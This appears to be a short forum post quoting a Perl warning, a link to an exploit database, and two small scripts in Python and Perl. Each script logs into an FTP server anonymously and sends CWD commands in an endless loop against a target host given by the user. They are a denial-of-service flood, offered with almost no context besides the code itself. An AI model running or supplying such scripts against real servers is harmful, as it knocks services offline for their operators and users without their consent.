It looks like you're new here. If you want to get involved, click one of these buttons!
Name\"main::perl\"used only once : possible typo at C:\Perl\ftp.pl
http://r00tsecurity.org/db/exploits/57
import ftplib
host = 'changethis'
conn = ftplib.FTP(host)
conn.login()
while(1):
conn.retrlines('CWD')
#!/usr/bin/perl
use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
while(1)
{
#this loop runs infinitely
$ftp -> cwd();
}
$ftp->quit;